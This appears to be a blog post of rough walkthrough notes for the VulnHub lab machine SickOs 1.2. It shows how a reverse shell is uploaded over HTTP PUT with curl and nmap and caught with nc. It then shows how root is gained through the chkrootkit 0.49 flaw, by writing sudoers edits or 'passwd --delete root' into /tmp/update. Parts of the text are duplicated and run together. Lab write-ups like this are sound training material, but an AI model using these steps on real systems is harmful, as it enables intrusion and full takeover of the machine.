walk thru
Notes :
walk thru
1. https://github.com/zionspike/vulnhub-writeup/blob/master/sick0s%201.2/kapi-note.md
2. https://wg135.github.io/blog/2016/05/31/vulhub-sickos1-dot-2/
Notes :
-80 is lightpd 1.4.28
- openssh 5.9p1 dec 5ubunti1.8
-PHP 5.3.10
2) dirrb shows /test web folder & ~sys~(getting 403 - Forbidden)
3) Curl shows /test folder allows PUT OPTIONS headers and upload a reverse shell
curl --upload-file php-reverse-shell.txt -v --url http://192.168.159.132/test/reverse_shell.php -0 --http1.0
* Trying 192.168.159.132...nmap -p80 192.168.79.180 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'
4) run nc on kali and point your browser to the php file
nc -nvlp 443
5) this will get you reverse shell
6) Tried to copy privshell file using the same process and ran nc to transfer the file. both didnt work.
7. looking around. found a chkrootkit under cron.daily. [ls -l /etc/cron.daily]
8. Look serachspolit for chkrootkit and we have one vulnerability applicable to version 0.49 [https://www.exploit-db.com/exploits/33899/]
9. run "dpkg -l | grep chkrootkit" or
/var/www/test/>chkrootkit -V
chkrootkit version 0.49
to see the version of chkrootkit installed on the victim
10. look searchsploit to see the details of the vulnerability
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/updateThis should give my www-data account sudo rights without a password :)...Not sure what each does
also need to change the privilages on the update file with chmod 777 and wait:
run run-parts cmd to execute cron job
run run-parts cmd to execute cron job
ls -al /etc/sudoers
try:
sudo su
instead of the echo & chmod command, I created a update script to remove the root password. Here is the script
$ echo 'passwd --delete root' > /tmp/update
$ chmod 777 /tmp/update
run parts. to run the cron job
when I ran the su root, I was getting Authentication failure but I was able to login to the console VM.
than I tried "sudo -i" which gave me root access
-i, --login
Run the shell specified by the target user's password database entry as a login shell. This means that login-specific resource files such as .profile, .bash_profile or .login will be read by the shell. If a command is specified, it is passed to the shell for execution via the shell's -c option. If no command is specified, an interactive shell is executed. sudo attempts to change to that user's home directory before running the shel.
or try
option b to run a file as root [source : http://jhosssecurity.blogspot.co.uk/2016/05/sickos-12-vulnhub.html]
or option c to use metasploit chkrootkit module [https://www.gknsb.com/2016/05/sickos-12-writeup.html]
11.chkrootkit Vulnerability
The vulnerability in chkrootkit requires that you create an executable file call update withing the /tmp directory of the server. When the cron job is run, the executable will be run as root. This was probably my biggest hangup when working through this machine. I tried many different executables before realizing that I knew the file name and location of the object I wanted. Therefore, I created a simple executable bash script to copy the file to the /tmp directory and change it's permissions to where all users could read it.
I had to remember to chmod +x update in order to allow the file to be run by the chkrootkit.
Since the cron job was only run daily, I used a simple command to make it run now. This run-parts command asked for a password for some parts of the job, but after skipping past entering the password, the job was able to finish.
At the end, my file was sitting in the tmp directory and I was able to open it as www-data.
or option d to create a little, stupid simple program that sets the setgid and setuid and then spawns a shell. [http://ch3rn0byl.com/sickos-1-2-walkthrough/]
$ echo 'passwd --delete root' > /tmp/update
$ chmod 777 /tmp/update
run parts. to run the cron job
when I ran the su root, I was getting Authentication failure but I was able to login to the console VM.
than I tried "sudo -i" which gave me root access
-i, --login
Run the shell specified by the target user's password database entry as a login shell. This means that login-specific resource files such as .profile, .bash_profile or .login will be read by the shell. If a command is specified, it is passed to the shell for execution via the shell's -c option. If no command is specified, an interactive shell is executed. sudo attempts to change to that user's home directory before running the shel.
or try
user@host:~$ sudo bash
root@host:~# suoption b to run a file as root [source : http://jhosssecurity.blogspot.co.uk/2016/05/sickos-12-vulnhub.html]
or option c to use metasploit chkrootkit module [https://www.gknsb.com/2016/05/sickos-12-writeup.html]
11.chkrootkit Vulnerability
The vulnerability in chkrootkit requires that you create an executable file call update withing the /tmp directory of the server. When the cron job is run, the executable will be run as root. This was probably my biggest hangup when working through this machine. I tried many different executables before realizing that I knew the file name and location of the object I wanted. Therefore, I created a simple executable bash script to copy the file to the /tmp directory and change it's permissions to where all users could read it.
I had to remember to chmod +x update in order to allow the file to be run by the chkrootkit.
Since the cron job was only run daily, I used a simple command to make it run now. This run-parts command asked for a password for some parts of the job, but after skipping past entering the password, the job was able to finish.
At the end, my file was sitting in the tmp directory and I was able to open it as www-data.
or option d to create a little, stupid simple program that sets the setgid and setuid and then spawns a shell. [http://ch3rn0byl.com/sickos-1-2-walkthrough/]
12. First thing I did was create a little, stupid simple program that sets the setgid and setuid and then spawns a shell. After this, I take advantage of update to set root ownership of this simple, yet deadly binary that will allow me to run it >:D
If all goes well, I will now have a simple tool of mass destruction waiting for me in /tmp.
Now, after waiting a minute or so…it’s time to check!
Great success!!
Comments
Post a Comment